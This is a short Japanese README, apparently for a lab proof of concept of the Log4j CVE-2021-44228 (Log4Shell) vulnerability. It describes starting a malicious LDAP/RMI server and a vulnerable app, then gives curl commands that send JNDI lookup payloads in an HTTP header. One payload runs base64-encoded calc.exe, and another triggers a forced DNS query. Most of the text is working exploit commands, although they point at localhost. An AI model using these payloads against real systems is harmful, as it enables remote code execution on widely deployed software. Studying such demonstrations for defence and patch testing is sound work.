
Log4j CVE-2021-44228 の例: リモートコード実行 (LDAP、RMI、... 経由)、強制DNSクエリ、...
脆弱なJDKを使用してください。例: JDK 1.8.0_181
悪意のあるサーバーは以下のエンドポイントをデプロイします:
./gradlew :malicious-server:bootRun
脆弱なアプリケーションは、8082 に1つのHTTPエンドポイントをデプロイします。
./gradlew :vulnerable-app:bootRun
脆弱なアプリケーションで実行されるペイロードを選択し、Base64でエンコードします。例として、Windowsで電卓を開くには: calc.exe
curl --header "X-Vulnerable-Header: ${jndi:ldap://localhost:1389/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/
curl --header "X-Vulnerable-Header: ${jndi:rmi://localhost:1099/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/
curl --header "X-Vulnerable-Header: ${jndi:dns://8.8.8.8/google.es}" http://127.0.0.1:8082/